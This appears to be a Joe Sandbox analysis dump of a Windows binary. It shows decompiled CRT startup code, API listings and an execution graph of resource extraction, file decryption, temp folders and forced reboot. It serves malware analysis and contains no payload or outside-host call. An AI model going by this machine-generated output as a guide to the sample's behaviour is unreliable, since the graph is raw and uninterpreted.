                                                Similarity
                                                • API ID: Char$Prev$Next
                                                • String ID:
                                                • API String ID: 3260447230-0
                                                • Opcode ID: 91d3f32b8d45ba0c1efc340c2b1e2ef844b1df0c8bd145598b8dffa042e35e6b
                                                • Instruction ID: e61d4781e7ddf48ecdda1479b87e862d76a91a7f1b07f28f09df94f92f574d00
                                                • Opcode Fuzzy Hash: 91d3f32b8d45ba0c1efc340c2b1e2ef844b1df0c8bd145598b8dffa042e35e6b
                                                • Instruction Fuzzy Hash: 41F0F432104150AEE7331A2CA8888BBBFDCDB8B19471901EFF8D1A7101D66B0D068B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E010669B0() {
                                                				intOrPtr* _t4;
                                                				intOrPtr* _t5;
                                                				void* _t6;
                                                				intOrPtr _t11;
                                                				intOrPtr _t12;
                                                
                                                				 *0x10681f8 = E01066C70();
                                                				__set_app_type(E01066FBE(2));
                                                				 *0x10688a4 =  *0x10688a4 | 0xffffffff;
                                                				 *0x10688a8 =  *0x10688a8 | 0xffffffff;
                                                				_t4 = __p__fmode();
                                                				_t11 =  *0x1068528; // 0x0
                                                				 *_t4 = _t11;
                                                				_t5 = __p__commode();
                                                				_t12 =  *0x106851c; // 0x0
                                                				 *_t5 = _t12;
                                                				_t6 = E01067000();
                                                				if( *0x1068000 == 0) {
                                                					__setusermatherr(E01067000);
                                                				}
                                                				E010671EF(_t6);
                                                				return 0;
                                                			}








                                                0x010669b7
                                                0x010669c2
                                                0x010669c8
                                                0x010669cf
                                                0x010669d8
                                                0x010669de
                                                0x010669e4
                                                0x010669e6
                                                0x010669ec
                                                0x010669f2
                                                0x010669f4
                                                0x01066a00
                                                0x01066a07
                                                0x01066a0d
                                                0x01066a0e
                                                0x01066a15

                                                APIs
                                                  • Part of subcall function 01066FBE: GetModuleHandleW.KERNEL32(00000000), ref: 01066FC5
                                                • __set_app_type.MSVCRT ref: 010669C2
                                                • __p__fmode.MSVCRT ref: 010669D8
                                                • __p__commode.MSVCRT ref: 010669E6
                                                • __setusermatherr.MSVCRT ref: 01066A07
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                • String ID:
                                                • API String ID: 1632413811-0
                                                • Opcode ID: fff6f6c3fa6415abd6fbf89c37cfd63ae8bebf2ebd7a0d3b8a0ab4fef204fed0
                                                • Instruction ID: 999985d7539846011194728d39012ca23cb5de0615650ee483e40437d5439999
                                                • Opcode Fuzzy Hash: fff6f6c3fa6415abd6fbf89c37cfd63ae8bebf2ebd7a0d3b8a0ab4fef204fed0
                                                • Instruction Fuzzy Hash: F4F09274688312CFD779AF38E5196583BA9FB44335B10865AE4E29A2E8CF3F85508F10
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:28.6%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:961
                                                Total number of Limit Nodes:25
                                                execution_graph 3119 ac6bef _XcptFilter 2196 ac4ca0 GlobalAlloc 2197 ac6a60 2214 ac7155 2197->2214 2199 ac6a65 2200 ac6a76 GetStartupInfoW 2199->2200 2201 ac6a93 2200->2201 2202 ac6aa8 2201->2202 2203 ac6aaf Sleep 2201->2203 2204 ac6ac7 _amsg_exit 2202->2204 2205 ac6ad1 2202->2205 2203->2201 2204->2205 2206 ac6b13 _initterm 2205->2206 2208 ac6af4 2205->2208 2212 ac6b2e __IsNonwritableInCurrentImage 2205->2212 2206->2212 2207 ac6bd6 _ismbblead 2207->2212 2209 ac6c1e 2209->2208 2211 ac6c27 _cexit 2209->2211 2211->2208 2212->2207 2212->2209 2213 ac6bbe exit 2212->2213 2219 ac2bfb GetVersion 2212->2219 2213->2212 2215 ac717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2214->2215 2216 ac717a 2214->2216 2218 ac71cd 2215->2218 2216->2215 2217 ac71e2 2216->2217 2217->2199 2218->2217 2220 ac2c0f 2219->2220 2221 ac2c50 2219->2221 2220->2221 2223 ac2c13 GetModuleHandleW 2220->2223 2236 ac2caa memset memset memset 2221->2236 2223->2221 2224 ac2c22 GetProcAddress 2223->2224 2224->2221 2233 ac2c34 2224->2233 2226 ac2c8e 2227 ac2c9e 2226->2227 2228 ac2c97 CloseHandle 2226->2228 2227->2212 2228->2227 2233->2221 2234 ac2c89 2330 ac1f90 2234->2330 2347 ac468f FindResourceA SizeofResource 2236->2347 2239 ac2ef3 2242 ac44b9 20 API calls 2239->2242 2240 ac2d2d CreateEventA SetEvent 2241 ac468f 7 API calls 2240->2241 2243 ac2d57 2241->2243 2244 ac2d6e 2242->2244 2245 ac2d5b 2243->2245 2247 ac2e1f 2243->2247 2250 ac468f 7 API calls 2243->2250 2352 ac6ce0 2244->2352 2357 ac44b9 2245->2357 2386 ac5c9e 2247->2386 2249 ac2c62 2249->2226 2277 ac2f1d 2249->2277 2253 ac2d9f 2250->2253 2253->2245 2256 ac2da3 CreateMutexA 2253->2256 2254 ac2e3a 2257 ac2e52 FindResourceA 2254->2257 2258 ac2e43 2254->2258 2255 ac2e30 2255->2239 2256->2247 2259 ac2dbd GetLastError 2256->2259 2262 ac2e6e 2257->2262 2263 ac2e64 LoadResource 2257->2263 2412 ac2390 2258->2412 2259->2247 2261 ac2dca 2259->2261 2264 ac2dea 2261->2264 2265 ac2dd5 2261->2265 2268 ac2e4d 2262->2268 2427 ac36ee GetVersionExA 2262->2427 2263->2262 2267 ac44b9 20 API calls 2264->2267 2266 ac44b9 20 API calls 2265->2266 2269 ac2de8 2266->2269 2270 ac2dff 2267->2270 2268->2244 2272 ac2e04 CloseHandle 2269->2272 2270->2247 2270->2272 2272->2244 2278 ac2f6c 2277->2278 2279 ac2f3f 2277->2279 2571 ac5164 2278->2571 2281 ac2f5f 2279->2281 2552 ac51e5 2279->2552 2699 ac3a3f 2281->2699 2283 ac2f71 2313 ac303c 2283->2313 2584 ac55a0 2283->2584 2289 ac6ce0 4 API calls 2290 ac2c6b 2289->2290 2317 ac52b6 2290->2317 2291 ac2f86 GetSystemDirectoryA 2292 ac658a CharPrevA 2291->2292 2293 ac2fab LoadLibraryA 2292->2293 2294 ac2ff7 FreeLibrary 2293->2294 2295 ac2fc0 GetProcAddress 2293->2295 2296 ac3006 2294->2296 2297 ac3017 SetCurrentDirectoryA 2294->2297 2295->2294 2298 ac2fd6 DecryptFileA 2295->2298 2296->2297 2632 ac621e GetWindowsDirectoryA 2296->2632 2299 ac3026 2297->2299 2301 ac3054 2297->2301 2298->2294 2305 ac2ff0 2298->2305 2304 ac44b9 20 API calls 2299->2304 2302 ac3061 2301->2302 2642 ac3b26 2301->2642 2307 ac307a 2302->2307 2302->2313 2651 ac256d 2302->2651 2309 ac3037 2304->2309 2305->2294 2311 ac3098 2307->2311 2662 ac3ba2 2307->2662 2718 ac6285 GetLastError 2309->2718 2311->2313 2314 ac30af 2311->2314 2313->2289 2720 ac4169 2314->2720 2318 ac52d6 2317->2318 2326 ac5316 2317->2326 2320 ac5300 LocalFree LocalFree 2318->2320 2321 ac52eb SetFileAttributesA DeleteFileA 2318->2321 2319 ac538c 2322 ac6ce0 4 API calls 2319->2322 2320->2318 2320->2326 2321->2320 2323 ac2c72 2322->2323 2323->2226 2323->2234 2325 ac535e SetCurrentDirectoryA 2328 ac2390 13 API calls 2325->2328 2326->2325 2327 ac65e8 4 API calls 2326->2327 2329 ac5374 2326->2329 2327->2325 2328->2329 2329->2319 3050 ac1fe1 2329->3050 2331 ac1f9a 2330->2331 2336 ac1f9f 2330->2336 2332 ac1ea7 15 API calls 2331->2332 2332->2336 2333 ac44b9 20 API calls 2338 ac1fc0 2333->2338 2334 ac1fcf ExitWindowsEx 2337 ac1fd9 2334->2337 2335 ac1ee2 GetCurrentProcess OpenProcessToken 2340 ac1f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2335->2340 2342 ac1f0e 2335->2342 2336->2333 2336->2337 2336->2338 2337->2226 2338->2334 2338->2335 2338->2337 2341 ac1f6b ExitWindowsEx 2340->2341 2340->2342 2341->2342 2343 ac1f1f 2341->2343 2344 ac44b9 20 API calls 2342->2344 2345 ac6ce0 4 API calls 2343->2345 2344->2343 2346 ac1f8c 2345->2346 2346->2226 2348 ac2d1a 2347->2348 2349 ac46b6 2347->2349 2348->2239 2348->2240 2349->2348 2350 ac46be FindResourceA LoadResource LockResource 2349->2350 2350->2348 2351 ac46df memcpy_s FreeResource 2350->2351 2351->2348 2353 ac6ce8 2352->2353 2354 ac6ceb 2352->2354 2353->2249 2469 ac6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2354->2469 2356 ac6e26 2356->2249 2358 ac44fe LoadStringA 2357->2358 2371 ac455a 2357->2371 2359 ac4527 2358->2359 2360 ac4562 2358->2360 2362 ac681f 10 API calls 2359->2362 2366 ac45c9 2360->2366 2372 ac457e LocalAlloc 2360->2372 2361 ac6ce0 4 API calls 2364 ac4689 2361->2364 2363 ac452c 2362->2363 2365 ac4536 MessageBoxA 2363->2365 2482 ac67c9 2363->2482 2364->2244 2365->2371 2368 ac45cd LocalAlloc 2366->2368 2369 ac4607 LocalAlloc 2366->2369 2368->2371 2374 ac45f3 2368->2374 2369->2371 2381 ac45c4 2369->2381 2371->2361 2372->2371 2379 ac45af 2372->2379 2377 ac171e _vsnprintf 2374->2377 2375 ac462d MessageBeep 2470 ac681f 2375->2470 2377->2381 2488 ac171e 2379->2488 2381->2375 2383 ac4645 MessageBoxA LocalFree 2383->2371 2384 ac67c9 EnumResourceLanguagesA 2384->2383 2392 ac5e17 2386->2392 2410 ac5cc3 2386->2410 2387 ac5dd0 2391 ac5dec GetModuleFileNameA 2387->2391 2387->2392 2388 ac6ce0 4 API calls 2390 ac2e2c 2388->2390 2389 ac5ced CharNextA 2389->2410 2390->2254 2390->2255 2391->2392 2393 ac5e0a 2391->2393 2392->2388 2498 ac66c8 2393->2498 2395 ac6218 2507 ac6e2a 2395->2507 2398 ac5e36 CharUpperA 2399 ac61d0 2398->2399 2398->2410 2400 ac44b9 20 API calls 2399->2400 2401 ac61e7 2400->2401 2402 ac61f7 ExitProcess 2401->2402 2403 ac61f0 CloseHandle 2401->2403 2403->2402 2404 ac5f9f CharUpperA 2404->2410 2405 ac5f59 CompareStringA 2405->2410 2406 ac6003 CharUpperA 2406->2410 2407 ac5edc CharUpperA 2407->2410 2408 ac60a2 CharUpperA 2408->2410 2409 ac667f IsDBCSLeadByte CharNextA 2409->2410 2410->2387 2410->2389 2410->2392 2410->2395 2410->2398 2410->2404 2410->2405 2410->2406 2410->2407 2410->2408 2410->2409 2503 ac658a 2410->2503 2413 ac24cb 2412->2413 2416 ac23b9 2412->2416 2414 ac6ce0 4 API calls 2413->2414 2415 ac24dc 2414->2415 2415->2268 2416->2413 2417 ac23e9 FindFirstFileA 2416->2417 2417->2413 2425 ac2407 2417->2425 2418 ac2479 2422 ac2488 SetFileAttributesA DeleteFileA 2418->2422 2419 ac2421 lstrcmpA 2420 ac24a9 FindNextFileA 2419->2420 2421 ac2431 lstrcmpA 2419->2421 2423 ac24bd FindClose RemoveDirectoryA 2420->2423 2420->2425 2421->2420 2421->2425 2422->2420 2423->2413 2424 ac658a CharPrevA 2424->2425 2425->2418 2425->2419 2425->2420 2425->2424 2426 ac2390 5 API calls 2425->2426 2426->2425 2431 ac3737 2427->2431 2433 ac372d 2427->2433 2428 ac44b9 20 API calls 2440 ac39fc 2428->2440 2429 ac6ce0 4 API calls 2430 ac2e92 2429->2430 2430->2244 2430->2268 2442 ac18a3 2430->2442 2431->2433 2434 ac38a4 2431->2434 2431->2440 2514 ac28e8 2431->2514 2433->2428 2433->2440 2434->2433 2435 ac39c1 MessageBeep 2434->2435 2434->2440 2436 ac681f 10 API calls 2435->2436 2437 ac39ce 2436->2437 2438 ac67c9 EnumResourceLanguagesA 2437->2438 2441 ac39d8 MessageBoxA 2437->2441 2438->2441 2440->2429 2441->2440 2443 ac18d5 2442->2443 2449 ac19b8 2442->2449 2543 ac17ee LoadLibraryA 2443->2543 2444 ac6ce0 4 API calls 2446 ac19d5 2444->2446 2446->2268 2462 ac6517 FindResourceA 2446->2462 2448 ac18e5 GetCurrentProcess OpenProcessToken 2448->2449 2450 ac1900 GetTokenInformation 2448->2450 2449->2444 2451 ac1918 GetLastError 2450->2451 2452 ac19aa CloseHandle 2450->2452 2451->2452 2453 ac1927 LocalAlloc 2451->2453 2452->2449 2454 ac1938 GetTokenInformation 2453->2454 2455 ac19a9 2453->2455 2456 ac194e AllocateAndInitializeSid 2454->2456 2457 ac19a2 LocalFree 2454->2457 2455->2452 2456->2457 2461 ac196e 2456->2461 2457->2455 2458 ac1999 FreeSid 2458->2457 2459 ac1975 EqualSid 2460 ac198c 2459->2460 2459->2461 2460->2458 2461->2458 2461->2459 2461->2460 2463 ac656b 2462->2463 2464 ac6536 LoadResource 2462->2464 2466 ac44b9 20 API calls 2463->2466 2464->2463 2465 ac6544 DialogBoxIndirectParamA FreeResource 2464->2465 2465->2463 2467 ac657c 2465->2467 2466->2467 2467->2268 2469->2356 2471 ac6857 GetVersionExA 2470->2471 2472 ac6940 2470->2472 2474 ac687c 2471->2474 2481 ac691a 2471->2481 2473 ac6ce0 4 API calls 2472->2473 2475 ac463b 2473->2475 2476 ac68a5 GetSystemMetrics 2474->2476 2474->2481 2475->2383 2475->2384 2477 ac68b5 RegOpenKeyExA 2476->2477 2476->2481 2478 ac68d6 RegQueryValueExA RegCloseKey 2477->2478 2477->2481 2479 ac690c 2478->2479 2478->2481 2492 ac66f9 2479->2492 2481->2472 2483 ac67e2 2482->2483 2485 ac6803 2482->2485 2496 ac6793 EnumResourceLanguagesA 2483->2496 2485->2365 2486 ac67f5 2486->2485 2497 ac6793 EnumResourceLanguagesA 2486->2497 2489 ac172d 2488->2489 2490 ac173d _vsnprintf 2489->2490 2491 ac175d 2489->2491 2490->2491 2491->2381 2493 ac670f 2492->2493 2494 ac6740 CharNextA 2493->2494 2495 ac674b 2493->2495 2494->2493 2495->2481 2496->2486 2497->2485 2502 ac66d5 2498->2502 2499 ac66f3 2499->2392 2501 ac66e5 CharNextA 2501->2502 2502->2499 2502->2501 2510 ac6648 2502->2510 2504 ac659b 2503->2504 2504->2504 2505 ac65b8 CharPrevA 2504->2505 2506 ac65ab 2504->2506 2505->2506 2506->2410 2513 ac6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2507->2513 2509 ac621d 2511 ac665d IsDBCSLeadByte 2510->2511 2512 ac6668 2510->2512 2511->2512 2512->2502 2513->2509 2515 ac2a62 2514->2515 2522 ac290d 2514->2522 2516 ac2a6e GlobalFree 2515->2516 2517 ac2a75 2515->2517 2516->2517 2517->2434 2519 ac2955 GlobalAlloc 2519->2515 2520 ac2968 GlobalLock 2519->2520 2520->2515 2520->2522 2521 ac2a20 GlobalUnlock 2521->2522 2522->2515 2522->2519 2522->2521 2523 ac2a80 GlobalUnlock 2522->2523 2524 ac2773 2522->2524 2523->2515 2525 ac28b2 2524->2525 2526 ac27a3 CharUpperA CharNextA CharNextA 2524->2526 2528 ac28b7 GetSystemDirectoryA 2525->2528 2527 ac27db 2526->2527 2526->2528 2529 ac28a8 GetWindowsDirectoryA 2527->2529 2530 ac27e3 2527->2530 2531 ac28bf 2528->2531 2529->2531 2535 ac658a CharPrevA 2530->2535 2532 ac28d2 2531->2532 2533 ac658a CharPrevA 2531->2533 2534 ac6ce0 4 API calls 2532->2534 2533->2532 2536 ac28e2 2534->2536 2537 ac2810 RegOpenKeyExA 2535->2537 2536->2522 2537->2531 2538 ac2837 RegQueryValueExA 2537->2538 2539 ac285c 2538->2539 2540 ac289a RegCloseKey 2538->2540 2541 ac2867 ExpandEnvironmentStringsA 2539->2541 2542 ac287a 2539->2542 2540->2531 2541->2542 2542->2540 2544 ac1826 GetProcAddress 2543->2544 2545 ac1890 2543->2545 2547 ac1889 FreeLibrary 2544->2547 2548 ac1839 AllocateAndInitializeSid 2544->2548 2546 ac6ce0 4 API calls 2545->2546 2549 ac189f 2546->2549 2547->2545 2548->2547 2550 ac185f FreeSid 2548->2550 2549->2448 2549->2449 2550->2547 2553 ac468f 7 API calls 2552->2553 2554 ac51f9 LocalAlloc 2553->2554 2555 ac522d 2554->2555 2556 ac520d 2554->2556 2557 ac468f 7 API calls 2555->2557 2558 ac44b9 20 API calls 2556->2558 2559 ac523a 2557->2559 2560 ac521e 2558->2560 2562 ac523e 2559->2562 2563 ac5262 lstrcmpA 2559->2563 2561 ac6285 GetLastError 2560->2561 2570 ac2f4d 2561->2570 2564 ac44b9 20 API calls 2562->2564 2565 ac527e 2563->2565 2566 ac5272 LocalFree 2563->2566 2567 ac524f LocalFree 2564->2567 2568 ac44b9 20 API calls 2565->2568 2566->2570 2567->2570 2569 ac5290 LocalFree 2568->2569 2569->2570 2570->2278 2570->2281 2570->2313 2572 ac468f 7 API calls 2571->2572 2573 ac5175 2572->2573 2574 ac517a 2573->2574 2575 ac51af 2573->2575 2577 ac44b9 20 API calls 2574->2577 2576 ac468f 7 API calls 2575->2576 2578 ac51c0 2576->2578 2579 ac518d 2577->2579 2733 ac6298 2578->2733 2579->2283 2582 ac51e1 2582->2283 2583 ac44b9 20 API calls 2583->2579 2585 ac468f 7 API calls 2584->2585 2586 ac55c7 LocalAlloc 2585->2586 2587 ac55fd 2586->2587 2588 ac55db 2586->2588 2590 ac468f 7 API calls 2587->2590 2589 ac44b9 20 API calls 2588->2589 2591 ac55ec 2589->2591 2592 ac560a 2590->2592 2593 ac6285 GetLastError 2591->2593 2594 ac560e 2592->2594 2595 ac5632 lstrcmpA 2592->2595 2620 ac55f1 2593->2620 2596 ac44b9 20 API calls 2594->2596 2597 ac564b LocalFree 2595->2597 2598 ac5645 2595->2598 2600 ac561f LocalFree 2596->2600 2599 ac5696 2597->2599 2601 ac565b 2597->2601 2598->2597 2602 ac589f 2599->2602 2605 ac56ae GetTempPathA 2599->2605 2600->2620 2606 ac5467 49 API calls 2601->2606 2603 ac6517 24 API calls 2602->2603 2603->2620 2604 ac6ce0 4 API calls 2607 ac2f7e 2604->2607 2608 ac56eb 2605->2608 2609 ac56c3 2605->2609 2610 ac5678 2606->2610 2607->2291 2607->2313 2614 ac586c GetWindowsDirectoryA 2608->2614 2615 ac5717 GetDriveTypeA 2608->2615 2608->2620 2745 ac5467 2609->2745 2613 ac44b9 20 API calls 2610->2613 2610->2620 2613->2620 2779 ac597d GetCurrentDirectoryA SetCurrentDirectoryA 2614->2779 2618 ac5730 GetFileAttributesA 2615->2618 2630 ac572b 2615->2630 2618->2630 2620->2604 2621 ac597d 34 API calls 2621->2630 2622 ac5467 49 API calls 2622->2608 2624 ac2630 21 API calls 2624->2630 2625 ac57c1 GetWindowsDirectoryA 2625->2630 2626 ac658a CharPrevA 2627 ac57e8 GetFileAttributesA 2626->2627 2628 ac57fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 ac5827 SetFileAttributesA 2629->2630 2630->2614 2630->2615 2630->2618 2630->2620 2630->2621 2630->2624 2630->2625 2630->2626 2630->2629 2631 ac5467 49 API calls 2630->2631 2775 ac6952 2630->2775 2631->2630 2633 ac6268 2632->2633 2634 ac6249 2632->2634 2636 ac597d 34 API calls 2633->2636 2635 ac44b9 20 API calls 2634->2635 2637 ac625a 2635->2637 2640 ac625f 2636->2640 2638 ac6285 GetLastError 2637->2638 2638->2640 2639 ac6ce0 4 API calls 2641 ac3013 2639->2641 2640->2639 2641->2297 2641->2313 2643 ac3b2d 2642->2643 2644 ac3b72 2643->2644 2645 ac3b53 2643->2645 2845 ac4fe0 2644->2845 2647 ac6517 24 API calls 2645->2647 2648 ac3b70 2647->2648 2649 ac6298 10 API calls 2648->2649 2650 ac3b7b 2648->2650 2649->2650 2650->2302 2652 ac2622 2651->2652 2653 ac2583 2651->2653 2896 ac24e0 GetWindowsDirectoryA 2652->2896 2655 ac25e8 RegOpenKeyExA 2653->2655 2656 ac258b 2653->2656 2657 ac2609 RegQueryInfoKeyA 2655->2657 2658 ac25e3 2655->2658 2656->2658 2660 ac259b RegOpenKeyExA 2656->2660 2659 ac25d1 RegCloseKey 2657->2659 2658->2307 2659->2658 2660->2658 2661 ac25bc RegQueryValueExA 2660->2661 2661->2659 2663 ac3bec 2662->2663 2664 ac3bdb 2662->2664 2666 ac3c03 memset 2663->2666 2667 ac3d13 2663->2667 2669 ac3d26 2663->2669 2673 ac3fd7 2663->2673 2674 ac3d7b CompareStringA 2663->2674 2675 ac3fab 2663->2675 2679 ac3f1e LocalFree 2663->2679 2680 ac3f46 LocalFree 2663->2680 2683 ac468f 7 API calls 2663->2683 2685 ac3cc7 CompareStringA 2663->2685 2696 ac3e10 2663->2696 2904 ac1ae8 2663->2904 2945 ac202a memset memset RegCreateKeyExA 2663->2945 2971 ac3fef 2663->2971 2665 ac468f 7 API calls 2664->2665 2665->2663 2666->2663 2668 ac44b9 20 API calls 2667->2668 2668->2669 2671 ac6ce0 4 API calls 2669->2671 2672 ac3f60 2671->2672 2672->2311 2673->2669 2995 ac2267 2673->2995 2674->2663 2674->2673 2678 ac44b9 20 API calls 2675->2678 2682 ac3fbe LocalFree 2678->2682 2679->2663 2679->2673 2680->2669 2682->2669 2683->2663 2685->2663 2686 ac3e1f GetProcAddress 2688 ac3f64 2686->2688 2686->2696 2687 ac3f92 2689 ac44b9 20 API calls 2687->2689 2691 ac44b9 20 API calls 2688->2691 2690 ac3fa9 2689->2690 2692 ac3f7c LocalFree 2690->2692 2693 ac3f75 FreeLibrary 2691->2693 2694 ac6285 GetLastError 2692->2694 2693->2692 2695 ac3f8b 2694->2695 2695->2669 2696->2686 2696->2687 2697 ac3eff FreeLibrary 2696->2697 2698 ac3f40 FreeLibrary 2696->2698 2985 ac6495 2696->2985 2697->2679 2698->2680 2700 ac468f 7 API calls 2699->2700 2701 ac3a55 LocalAlloc 2700->2701 2702 ac3a6c 2701->2702 2703 ac3a8e 2701->2703 2704 ac44b9 20 API calls 2702->2704 2705 ac468f 7 API calls 2703->2705 2706 ac3a7d 2704->2706 2707 ac3a98 2705->2707 2708 ac6285 GetLastError 2706->2708 2709 ac3a9c 2707->2709 2710 ac3ac5 lstrcmpA 2707->2710 2714 ac2f64 2708->2714 2711 ac44b9 20 API calls 2709->2711 2712 ac3b0d LocalFree 2710->2712 2713 ac3ada 2710->2713 2715 ac3aad LocalFree 2711->2715 2712->2714 2716 ac6517 24 API calls 2713->2716 2714->2278 2714->2313 2715->2714 2717 ac3aec LocalFree 2716->2717 2717->2714 2719 ac628f 2718->2719 2719->2313 2721 ac468f 7 API calls 2720->2721 2722 ac417d LocalAlloc 2721->2722 2723 ac41a8 2722->2723 2724 ac4195 2722->2724 2726 ac468f 7 API calls 2723->2726 2725 ac44b9 20 API calls 2724->2725 2727 ac41a6 2725->2727 2728 ac41b5 2726->2728 2727->2313 2729 ac41b9 2728->2729 2730 ac41c5 lstrcmpA 2728->2730 2732 ac44b9 20 API calls 2729->2732 2730->2729 2731 ac41e6 LocalFree 2730->2731 2731->2727 2732->2731 2734 ac171e _vsnprintf 2733->2734 2744 ac62c9 FindResourceA 2734->2744 2736 ac62cb LoadResource LockResource 2737 ac6353 2736->2737 2740 ac62e0 2736->2740 2738 ac6ce0 4 API calls 2737->2738 2739 ac51ca 2738->2739 2739->2582 2739->2583 2741 ac631b FreeResource 2740->2741 2742 ac6355 FreeResource 2740->2742 2743 ac171e _vsnprintf 2741->2743 2742->2737 2743->2744 2744->2736 2744->2737 2746 ac551a 2745->2746 2747 ac548a 2745->2747 2816 ac58c8 2746->2816 2805 ac53a1 2747->2805 2751 ac5495 2754 ac550c 2751->2754 2755 ac54c2 GetSystemInfo 2751->2755 2760 ac5581 2751->2760 2752 ac6ce0 4 API calls 2756 ac559a 2752->2756 2753 ac553b CreateDirectoryA 2757 ac5577 2753->2757 2758 ac5547 2753->2758 2762 ac658a CharPrevA 2754->2762 2764 ac54da 2755->2764 2756->2620 2769 ac2630 GetWindowsDirectoryA 2756->2769 2763 ac6285 GetLastError 2757->2763 2759 ac554d 2758->2759 2759->2760 2761 ac597d 34 API calls 2759->2761 2760->2752 2765 ac555c 2761->2765 2762->2746 2766 ac557c 2763->2766 2764->2754 2767 ac658a CharPrevA 2764->2767 2765->2760 2768 ac5568 RemoveDirectoryA 2765->2768 2766->2760 2767->2754 2768->2760 2770 ac265e 2769->2770 2771 ac266f 2769->2771 2772 ac44b9 20 API calls 2770->2772 2773 ac6ce0 4 API calls 2771->2773 2772->2771 2774 ac2687 2773->2774 2774->2608 2774->2622 2776 ac696e GetDiskFreeSpaceA 2775->2776 2777 ac69a1 2775->2777 2776->2777 2778 ac6989 MulDiv 2776->2778 2777->2630 2778->2777 2780 ac59dd GetDiskFreeSpaceA 2779->2780 2781 ac59bb 2779->2781 2782 ac5ba1 memset 2780->2782 2783 ac5a21 MulDiv 2780->2783 2784 ac44b9 20 API calls 2781->2784 2785 ac6285 GetLastError 2782->2785 2783->2782 2786 ac5a50 GetVolumeInformationA 2783->2786 2787 ac59cc 2784->2787 2788 ac5bbc GetLastError FormatMessageA 2785->2788 2789 ac5a6e memset 2786->2789 2790 ac5ab5 SetCurrentDirectoryA 2786->2790 2791 ac6285 GetLastError 2787->2791 2792 ac5be3 2788->2792 2793 ac6285 GetLastError 2789->2793 2800 ac5acc 2790->2800 2798 ac59d1 2791->2798 2794 ac44b9 20 API calls 2792->2794 2795 ac5a89 GetLastError FormatMessageA 2793->2795 2796 ac5bf5 SetCurrentDirectoryA 2794->2796 2795->2792 2796->2798 2797 ac6ce0 4 API calls 2799 ac5c11 2797->2799 2798->2797 2799->2608 2801 ac5b0a 2800->2801 2803 ac5b20 2800->2803 2802 ac44b9 20 API calls 2801->2802 2802->2798 2803->2798 2828 ac268b 2803->2828 2807 ac53bf 2805->2807 2806 ac171e _vsnprintf 2806->2807 2807->2806 2808 ac658a CharPrevA 2807->2808 2811 ac5415 GetTempFileNameA 2807->2811 2809 ac53fa RemoveDirectoryA GetFileAttributesA 2808->2809 2809->2807 2810 ac544f CreateDirectoryA 2809->2810 2810->2811 2812 ac543a 2810->2812 2811->2812 2813 ac5429 DeleteFileA CreateDirectoryA 2811->2813 2814 ac6ce0 4 API calls 2812->2814 2813->2812 2815 ac5449 2814->2815 2815->2751 2817 ac58d8 2816->2817 2817->2817 2818 ac58df LocalAlloc 2817->2818 2819 ac5919 2818->2819 2820 ac58f3 2818->2820 2824 ac658a CharPrevA 2819->2824 2821 ac44b9 20 API calls 2820->2821 2822 ac5906 2821->2822 2823 ac6285 GetLastError 2822->2823 2825 ac5534 2822->2825 2823->2825 2826 ac5931 CreateFileA LocalFree 2824->2826 2825->2753 2825->2759 2826->2822 2827 ac595b CloseHandle GetFileAttributesA 2826->2827 2827->2822 2829 ac26b9 2828->2829 2830 ac26e5 2828->2830 2831 ac171e _vsnprintf 2829->2831 2832 ac271f 2830->2832 2833 ac26ea 2830->2833 2835 ac26cc 2831->2835 2834 ac26e3 2832->2834 2837 ac171e _vsnprintf 2832->2837 2836 ac171e _vsnprintf 2833->2836 2838 ac6ce0 4 API calls 2834->2838 2839 ac44b9 20 API calls 2835->2839 2840 ac26fd 2836->2840 2841 ac2735 2837->2841 2842 ac276d 2838->2842 2839->2834 2843 ac44b9 20 API calls 2840->2843 2844 ac44b9 20 API calls 2841->2844 2842->2798 2843->2834 2844->2834 2846 ac468f 7 API calls 2845->2846 2847 ac4ff5 FindResourceA LoadResource LockResource 2846->2847 2848 ac5020 2847->2848 2858 ac515f 2847->2858 2849 ac5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2849 2850 ac5057 2848->2850 2849->2850 2864 ac4efd 2850->2864 2853 ac507c 2856 ac44b9 20 API calls 2853->2856 2860 ac5075 2853->2860 2854 ac5060 2855 ac44b9 20 API calls 2854->2855 2855->2860 2856->2860 2857 ac5110 FreeResource 2861 ac511d 2857->2861 2858->2648 2859 ac513a 2859->2858 2862 ac514c SendMessageA 2859->2862 2860->2857 2860->2861 2861->2859 2863 ac44b9 20 API calls 2861->2863 2862->2858 2863->2859 2866 ac4f4a 2864->2866 2865 ac4fa1 2868 ac6ce0 4 API calls 2865->2868 2866->2865 2872 ac4980 2866->2872 2869 ac4fc6 2868->2869 2869->2853 2869->2854 2873 ac4990 2872->2873 2874 ac49a5 2873->2874 2875 ac49c2 lstrcmpA 2873->2875 2876 ac44b9 20 API calls 2874->2876 2877 ac49ba 2875->2877 2878 ac4a0e 2875->2878 2876->2877 2877->2865 2880 ac4b60 2877->2880 2878->2877 2883 ac487a 2878->2883 2881 ac4b76 2880->2881 2882 ac4b92 FindCloseChangeNotification 2880->2882 2881->2865 2882->2881 2884 ac48a2 CreateFileA 2883->2884 2886 ac4908 2884->2886 2887 ac48e9 2884->2887 2886->2877 2887->2886 2888 ac48ee 2887->2888 2891 ac490c 2888->2891 